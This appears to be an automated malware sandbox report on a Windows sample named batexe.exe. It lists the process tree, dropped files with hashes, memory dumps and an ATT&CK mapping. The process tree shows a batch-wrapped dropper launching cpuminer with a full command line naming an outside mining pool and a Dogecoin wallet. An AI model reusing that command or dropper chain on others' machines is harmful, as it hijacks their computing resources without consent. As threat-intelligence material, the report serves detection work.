73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
17/02/2024, 10:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2320	b2e.exe
2328	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2328	cpuminer-sse2.exe
2328	cpuminer-sse2.exe
2328	cpuminer-sse2.exe
2328	cpuminer-sse2.exe
2328	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4624-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4624 wrote to memory of 2320	4624	batexe.exe	74
PID 4624 wrote to memory of 2320	4624	batexe.exe	74
PID 4624 wrote to memory of 2320	4624	batexe.exe	74
PID 2320 wrote to memory of 2268	2320	b2e.exe	75
PID 2320 wrote to memory of 2268	2320	b2e.exe	75
PID 2320 wrote to memory of 2268	2320	b2e.exe	75
PID 2268 wrote to memory of 2328	2268	cmd.exe	78
PID 2268 wrote to memory of 2328	2268	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4624
- C:\Users\Admin\AppData\Local\Temp\219C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\219C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\219C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\272A.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2268
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\219C.tmp\b2e.exe

Filesize
256KB

MD5
18c91665349cf71648d4af5d21843ea9

SHA1
6be582f8587a42e96d73bf174cb6d6345761c192

SHA256
979d6a944f61f2cde2dea724ce5e0297005602c15fbbbcb917540ec1b1f3f937

SHA512
544d110b9bde470b9411a91f9195bf5e6914c1e5c59ec4485be08acaecd0e519d1c932181cf5a76d5241dedc362beb56f2fb407d808d554e43d408b34a621d48

Download Submit
C:\Users\Admin\AppData\Local\Temp\219C.tmp\b2e.exe

Filesize
768KB

MD5
41acb3c7c35169437c8e50c36e39f5a5

SHA1
6b7a95c8fb404247edb7430b46e931495eeba0d1

SHA256
77003c5f07279f31ace3879feb99ce0568a05bc7bc56ecd5707bc0581cb6016a

SHA512
670b258078f3ccd9e3e710a994d95d406094dab87b4e4e11e3b312a7883631877ea896bc53150cb8b9bb8a0500df129005973212fce0541978df505edbe7d145

Download Submit
C:\Users\Admin\AppData\Local\Temp\272A.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
237KB

MD5
7e58ca6784941364e721b37cf5ac0e64

SHA1
36d465f60ba3b2b89f6cd1532897cd60d4626446

SHA256
6a34d01c1490566ea461f596e4e316687ec29839a4c9a5167bf62d24e0ac3ffc

SHA512
2881c5b50d9dc2114171c81731ff652881c952eecbccedb6c4a32677ee0fb8d66941dcfb4f508536e998c13f4f6ab5cc4de2fd03d0b6047f37bf682620f01a6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
310KB

MD5
8b8b8bd377b57a24eba2a3e70dd1f115

SHA1
3948ef71a1a8f54f59fe9bdf07628e88326ce5dd

SHA256
15dfe5e664f32cea3baaa028e4d04e91dae4e9a496c0ca22be39f407ab8569dc

SHA512
53e65c9607f9557ecee138ed5fc63879b38256d29e1f6ba53f4594af018e3db9bf87cf15b4d54fe8e153757c8445252243d3dec28d67271e7d6d0a72f101e78b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
291KB

MD5
ecf14c4e693bd9b7552933850b17eb01

SHA1
9bdc0ede5ba03ba859d303424cc843dd10bb6656

SHA256
61e491c41226871ee68218a01f11e332fe5065dbee8064cd8bb22094cda81c40

SHA512
ab1edd505def7a8980d14b9293e03c6c5c622139457fac5451edb2fde56e27a59e34cf0440731c3c3ef73a486d54090ef7f2032d9d4ace0ec0e8e18119fc70ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
171KB

MD5
221673994de533c333a1ed531ae890f9

SHA1
d05c9f915a780cca4579d53586b330c600ea36ee

SHA256
2dc090746ef2a5a819141fcbeeb839ca4f6c21e4a940dd99839e57daa6fcbc1e

SHA512
1f682ef0561d3e2f3987cbbcab03a60feb54776edfcd4563d5983d5b288b4a5534277ee5b43930951f87e6c59b769bc00883c367b26eb371c79d212c14908d92

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
388KB

MD5
e126b1e726862be019fd6216ebdc8398

SHA1
27eeee1d6e7feee7b38ec295d78d151f818b6338

SHA256
ba6b0fbfebf4911e22bbe8aa35d533434ec2f51d9ae90aeaea8564ea8e649749

SHA512
ce2b4e8044316488e4cb58413e5e4ebc6aff3b4910885a2c4e3718f7372e8ea55077a63520b5de70c0b564aba019dae4d7ccd9a5cd199772dc5359e492a1af3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
227KB

MD5
f90cafb471033191d208df3b184fa5bf

SHA1
869f51232a1f118ca708546a66a0ab80a3f5da53

SHA256
806b7a24b1e584dee567297157e00d725bd3835af4738b2711ba5878beca9a12

SHA512
96331fbf507b02f7f910cb952740c2dfd44ee648d1ca1c3a914efcea4037cae3d86394bdf2378bdcf4ce3e0e8e9e588b174b4a9e70041a257137b676796a0a90

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
301KB

MD5
c3d3da317a5a49bf6feac8223fc3f9d0

SHA1
3f10ae62bc73d61dacdf9f0d309a990226a2cad9

SHA256
a89830bc9a013c0568849aecea930c4e4d200ff2d546a9cc43207dbc8c273ff1

SHA512
1ffb1f8381fb51f48a82990574e8241173ed84c90f437a92581eeb66ea408b4dc0b0e8d6807f8134b0cc93427672f93611820df1501d7f769a02148d54f490a4

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
336KB

MD5
f49d3141cc2c86c874331ddbd8143c54

SHA1
6c94ea249d1514a3bf59371bde7736d5f6751a60

SHA256
cbcb32c9cdbb22ab3f0c53678be8aefeef0fc0a8d41ec32514b36e02cbba356a

SHA512
9ca6a7dd87e2ab683c220e1fa0f6948fc8ba49417a40fad24e000692abee23d72fc7c20e1da96032233ce161f5d596dde95ae53c617f3d52bb3978cf1e6e2389

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
290KB

MD5
43c8f7c9166496719eeb9d34ad9c610b

SHA1
d719fdfa26a40d9d1bbdb2cbfab434f1f0c391b6

SHA256
118124de3205c8f0c5ccfb12fdc6659f2f9b6c90156181716d26b57cc17db8fe

SHA512
d5dd26364334455aea85c954d5b8840a0adf361a7e30f6c85e9abfc22d7c4352f59d82e373bef5bbe75e0dcd5b7df0bf18ed83fec1831752c0a7251d33dd45d1

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
180KB

MD5
3fafe4a38ebcf22dc240128693d37a7b

SHA1
d627bd76b2c89ddadf30bdbe7c490e6f94a2d4e2

SHA256
49174ff01d8f4a21945d4c5e6afa1b51e77872f5a2771d3aba1fd4474c35a7ba

SHA512
5b0c06571b99ee2c6ca55137921a67a881001c7b3c80e0dcf92c698b5275225a4064544777a5bbf2923a2d482e06e0e2794af6d870df32a5e514d0c630bbbf35

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
141KB

MD5
1b3ad9232453f04fe70081634f6a888c

SHA1
40dff190de9f5d2d18c9588ff04790d9ab801924

SHA256
137021a09fa7876b08a372aa47f5fc326668efbaeaad8274b6f3bd0edfad1106

SHA512
1bb208d185cea0368f2b3d12ac4ce543ba2faaf379d6a8a41c58e3d76ddd1c64d39c3b237193f295ea5d5122956a6ceaca2de1db438b94c647ea5974548a067f

Download Submit
memory/2320-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2320-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2328-43-0x0000000050AE0000-0x0000000050B78000-memory.dmp

Filesize
608KB

Download
memory/2328-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2328-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-44-0x0000000001090000-0x0000000002945000-memory.dmp

Filesize
24.7MB

Download
memory/2328-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2328-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2328-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4624-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download